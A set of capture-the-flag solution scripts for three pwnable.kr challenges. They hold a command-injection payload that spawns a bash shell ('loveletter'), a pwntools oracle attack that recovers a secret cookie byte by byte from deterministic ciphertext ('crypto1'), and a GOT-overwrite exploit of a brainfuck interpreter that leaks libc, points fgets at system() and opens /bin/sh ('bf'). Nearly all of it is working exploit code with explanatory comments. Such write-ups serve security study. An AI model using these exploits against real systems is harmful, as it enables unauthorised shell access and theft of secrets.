1. loveletter
Solution (the single payload string sent to the program):
# Command fragment followed by 'A' padding and a trailing '|' + 0x01 byte; the
# padding is sized so the whole string is exactly 255 characters.
# NOTE(review): the 256 - prefix - suffix - 1 arithmetic presumably mirrors the
# target's 256-byte buffer minus room for a terminator - confirm against the binary.
prefix = 'nv sh -c bash '
suffix = '|\x01'
payload = prefix + 'A' * (256 - len(prefix) - len(suffix) - 1) + suffix
2. crypto1
Solution (byte-at-a-time recovery of the cookie through a ciphertext-comparison oracle):
from pwn import *
# Cookie bytes recovered so far; getcookie() appends one character per position.
cookie = ''

# Candidate alphabet tried for every cookie byte: digits, lowercase letters, '-' and '_'.
t = '1234567890' + 'abcdefghijklmnopqrstuvwxyz' + '-_'
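def getmessage(message):
    """Send *message* as the ID (with an empty PW) to the crypto1 service and
    return the ciphertext the server echoes back.

    The text returned is whatever sits between 'sending encrypted data (' and
    the closing ')' - presumably hex, since the caller slices it in units of
    32 characters (16 bytes, one cipher block).

    The connection is always closed, even when a recv() times out or the
    service hangs up mid-exchange.  The original only closed on the happy
    path, and getcookie() opens one connection per candidate character, so a
    leaked socket per failure adds up quickly.
    """
    p = remote('pwnable.kr', 9006)
    try:
        p.recvuntil('ID\n')
        p.sendline(str(message))
        p.recvuntil('PW\n')
        p.sendline()  # empty password
        p.recvuntil('sending encrypted data (')
        # Drop the trailing ')' delimiter; everything before it is the ciphertext.
        return p.recvuntil(')')[:-1]
    finally:
        p.close()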
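def getcookie(n):
    """Recover the n-th (1-based) cookie byte and append it to the global ``cookie``.

    Oracle: the service encrypts a packet built from our ID and the secret
    cookie (presumably ID + '-' + PW + '-' + cookie, i.e. two separator bytes -
    the offsets below assume exactly that).  Because the ciphertext is
    deterministic, two plaintexts that agree up to and including a given block
    produce the same ciphertext block there (ECB, or CBC with a fixed IV).

    Step 1 sends an ID of 62-n dashes so that the n-th cookie byte lands at
    plaintext offset 63, the last byte of the fourth 16-byte block, and keeps
    that block (hex characters 96..127) as the target.  Step 2 sends, for each
    candidate character, a 64-byte ID whose last bytes are the already-known
    cookie prefix plus the candidate - putting the candidate at the same
    offset 63 - and compares the same block.  A match means the candidate
    equals the real byte.

    Unlike the original, a position where no candidate matches is reported
    instead of silently skipped: every later position would then be misaligned
    and the rest of the recovered cookie would be garbage.
    """
    global cookie
    # 62 - n dashes + two separators = 64 - n bytes before the cookie, so cookie
    # byte n sits at offset 63.  n % 64 is a no-op for the 1..63 range used.
    target = getmessage('-' * (62 - n % 64))[96:128]
    for guess in t:
        # 64 - n dashes + (n - 1) known bytes + 1 guess = 64 bytes; the guess is
        # at offset 63, aligned with the cookie byte in the target request.
        probe = '-' * (63 - len(cookie)) + cookie + guess
        if getmessage(probe)[96:128] == target:
            cookie += guess
            print(cookie)
            break
    else:
        log.warning('no candidate in alphabet matched cookie byte %d; '
                    'later positions will be misaligned' % n)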
# Recover up to 63 cookie bytes, one position per call; getcookie() extends the
# global ``cookie`` and prints progress as it goes.
for position in range(1, 64):
    getcookie(position)
3. bf
Solution (GOT overwrite through the brainfuck interpreter's tape pointer):
#encoding=utf-8
from pwn import *
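# True: attack the live service with the libc shipped with the challenge.
# False: run ./bf locally against the system libc.  The system()/gets() offsets
# computed later are only valid for the libc the *target* actually loads, so the
# two choices must stay paired.
REMOTE = False

if REMOTE:
    s = remote('pwnable.kr', 9001)
else:
    s = process('./bf')

context.terminal = ['tmux', 'splitw', '-h']

# Handy when single-stepping the interpreter loop locally.
breakpoints = [0x08048648]
#gdb.attach(s,gdbscript='\n'.join(['b *'+str(x) for x in breakpoints])+'c 5\n')

if REMOTE:
    libc = ELF('./bf_libc.so')
else:
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')

context.log_level = 'debug'

# Consume the two lines the program prints before it reads our brainfuck code.
s.recvlines(2)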
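# Fixed addresses in ./bf (no PIE): the interpreter's tape pointer and the GOT
# slots we retarget.  The tape pointer starts above the GOT, so '<' walks down
# into it and ',' / '.' become an arbitrary write / read over the GOT.
p = 0x0804A0A0          # initial value of the tape pointer
putchar = 0x0804a030    # putchar@GOT
memset = 0x0804a02c     # memset@GOT
fgets = 0x0804a010      # fgets@GOT
main_addr = 0x8048671   # main(); re-entered once the GOT is patched

# Brainfuck program: '<'/'>' move the tape pointer, '.' prints *p, ',' reads one
# byte from stdin into *p.  Each ',>' run consumes exactly 4 raw bytes, which the
# caller supplies as p32() values in this order: main_addr, system_addr, gets_addr
# (the original comment said "memset to fgets" - the third write is gets()).
parts = [
    '<' * (p - (putchar + 4)),    # walk down to the byte just past putchar@GOT
    '.<' * 4 + '.',               # print putchar+4 .. putchar+0; the first byte is
                                  # junk, the next four are the GOT entry high byte first
    ',>' * 4,                     # putchar@GOT <- main_addr
    '<' * (putchar + 4 - fgets),  # move to fgets@GOT
    ',>' * 4,                     # fgets@GOT   <- system_addr
    '>' * (memset - fgets - 4),   # move to memset@GOT
    ',>' * 4,                     # memset@GOT  <- gets_addr
    '.',                          # putchar() -> main(); presumably main then calls
                                  # memset (now gets) and fgets (now system) on the same
                                  # buffer, so the next line we send is executed - confirm
                                  # in the disassembly
]
payload = ''.join(parts)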
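s.sendline(payload)

# The first '.' printed the byte at putchar+4, which we do not need.
s.recv(1)
# The next four '.' printed putchar+3 .. putchar+0, i.e. the GOT entry with its
# most significant byte first - hence the big-endian unpack.
putchar_addr = u32(s.recv(4), endianness='big')
log.info('putchar_addr:' + hex(putchar_addr))

# Resolve system()/gets() relative to the leaked putchar().  A libc base that is
# not page-aligned means the leak is wrong or we are diffing against the wrong
# libc; the GOT writes below would then just crash the target, so say so first.
libc_base = putchar_addr - libc.symbols['putchar']
if libc_base & 0xfff:
    log.warning('libc base %#x is not page aligned - bad leak or wrong libc?' % libc_base)
system_addr = libc_base + libc.symbols['system']
gets_addr = libc_base + libc.symbols['gets']
log.info('libc base %#x, system %#x, gets %#x' % (libc_base, system_addr, gets_addr))

# Each ',>' run in the payload reads exactly 4 raw bytes; deliver them in GOT order.
s.send(p32(main_addr))    # putchar@GOT -> main
s.send(p32(system_addr))  # fgets@GOT   -> system
s.send(p32(gets_addr))    # memset@GOT  -> gets
# Read by gets() (the old memset slot) and then handed to system() (the old fgets
# slot).  The embedded NUL ends the command before the newline gets() strips.
s.sendline('/bin/sh\x00')
s.interactive()
# interactive() returns once the shell exits; the original's raw_input() after it
# was Python-2-only and had nothing left to wait for.
s.close()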